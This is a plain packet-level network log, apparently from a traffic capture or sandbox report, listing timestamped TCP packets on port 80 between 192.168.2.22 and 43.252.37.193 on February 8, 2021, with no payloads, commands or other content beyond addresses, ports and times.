Feb 8, 2021 10:28:29.326395035 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.326405048 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.326406002 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.326411963 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.326416969 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.326448917 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.326450109 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.326484919 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.326513052 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.530951977 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.531013012 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.531054974 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.531092882 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.531131983 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.531207085 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.531265020 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.531271935 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.533341885 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.533375978 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.736124039 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.736156940 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.736181021 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.736207008 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.736479044 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.736532927 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.736541033 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.738075972 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.738205910 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.738210917 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.738297939 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.942842960 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.942926884 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.942955971 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.942982912 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.943006992 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.943039894 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.943065882 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.944509983 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.944545031 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.944677114 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.149962902 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.149995089 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.150077105 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.150104046 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.150129080 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.150152922 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.150186062 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.150233984 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.150242090 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.151513100 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.151544094 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.151617050 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.356379032 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.356416941 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.356455088 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.356482029 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.356508970 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.356719971 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.356767893 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.356776953 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.356781960 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.357953072 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.358097076 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.561196089 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.561232090 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.561248064 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.561264038 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.561280966 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.561518908 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.561585903 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.561593056 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.561598063 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.561610937 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.766086102 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.766114950 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.766140938 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.766343117 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.766376972 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.766408920 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.766467094 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.766525984 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.766539097 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.767636061 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.970762014 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.970968008 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.970971107 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.971025944 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.971035004 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.971077919 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.971127033 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.971127987 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:30.971138954 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:30.971190929 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:31.176309109 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:31.176348925 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:31.176429987 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:31.176471949 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:31.176515102 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:31.176525116 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:31.176567078 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:31.176572084 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:31.176573992 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:31.176579952 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:31.176585913 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:31.176634073 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:31.381071091 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:31.381136894 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:31.381189108 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:31.381206036 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:31.381238937 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:31.381248951 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:31.381256104 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:31.381304979 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:31.585445881 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:31.585628033 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:31.585694075 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:31.585738897 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:31.585752964 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:31.585783005 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:31.585787058 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:31.585829973 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:31.790067911 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:31.790105104 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:31.790189028 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:31.790236950 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:31.790277004 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:31.790314913 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:31.790318966 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:31.996789932 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:31.996819973 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:31.996849060 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:31.996877909 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:31.997014999 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:32.000993967 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:32.203608990 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:32.203682899 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:32.203725100 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:32.203763962 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:32.203861952 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:32.204010963 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:32.208592892 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:32.208652020 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:32.208772898 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:32.316287994 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:32.408226967 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:32.408247948 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:32.408411980 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:32.408473015 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:32.408533096 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:32.413209915 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:32.413249969 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:32.413393021 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:32.416275978 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:32.612818956 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:32.612864017 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:32.613111019 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:32.613742113 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:32.617857933 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:32.620515108 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:32.620691061 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:32.620748997 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:32.818103075 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:32.818212986 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:32.824987888 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:32.825047970 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:32.825125933 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:32.825186014 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:33.022675991 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.022701979 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.022994041 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:33.023055077 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:33.029460907 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.029500008 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.029690981 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:33.227931976 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.227977037 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.228328943 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:33.234119892 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.234158993 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.234381914 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:33.432899952 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.432931900 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.433176041 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:33.438755989 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.438791037 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.439097881 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:33.640119076 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.640151024 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.640183926 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.640208006 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.640305042 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:33.640348911 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:33.640355110 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:33.640360117 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:33.647017002 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.647049904 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.647114992 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:33.647172928 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:33.844959021 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.845041037 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.845099926 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:33.845110893 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.845154047 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:33.845161915 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:33.851737976 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.851778984 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:33.851979017 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:33.852018118 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:34.052057028 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.052088022 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.052117109 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.052218914 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:34.052287102 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:34.052298069 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:34.058980942 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.059242010 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:34.258869886 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.258929014 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.259226084 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:34.265119076 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.265189886 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.265378952 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:34.265422106 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:34.463639975 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.463711977 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.463926077 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:34.469863892 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.469927073 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.470094919 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:34.668499947 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.668565989 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.668741941 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:34.674501896 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.674556971 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.674607992 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.674655914 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.674681902 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:34.674712896 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:34.674757004 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:34.873249054 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.873303890 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.873517990 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:34.880965948 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.881156921 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:34.881161928 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.881266117 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.881272078 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:34.881345034 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:34.881351948 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:34.881462097 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:35.078035116 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.078083992 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.078334093 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:35.086116076 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.086183071 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.086215973 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.086246967 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.086342096 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:35.086388111 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:35.282727957 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.282774925 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.282919884 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:35.290610075 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.290658951 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.290750027 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.290779114 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:35.290791988 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.290797949 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:35.290805101 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:35.290843010 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:35.487344980 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.487385035 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.487620115 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:35.497509003 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.497553110 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.497582912 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.497610092 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.497713089 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:35.500684977 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:35.692519903 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.692594051 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.692864895 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:35.703553915 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.703645945 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.703718901 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:35.703754902 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:35.705142975 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.705200911 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.705302954 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:35.705352068 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:35.899770021 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.899837017 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.899878025 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:35.899884939 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.899924994 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:35.899933100 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:35.910870075 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.910924911 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.910957098 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:35.910991907 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:35.912627935 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:35.912702084 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.106460094 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.106527090 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.106653929 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.106702089 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.107059956 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.107117891 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.107131958 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.107173920 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.117801905 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.117947102 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.118005991 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.118041039 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.119401932 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.119517088 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.311165094 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.311402082 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.311469078 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.311594963 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.322501898 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.322621107 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.322622061 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.323101997 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.515986919 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.516055107 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.516108990 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.516159058 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.516345024 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.516405106 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.527261019 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.527318954 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.527460098 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.527479887 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.722153902 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.722229004 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.722259998 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.722290993 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.724117041 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.733603001 CET	80	49167	43.252.37.193	192.168.2.22
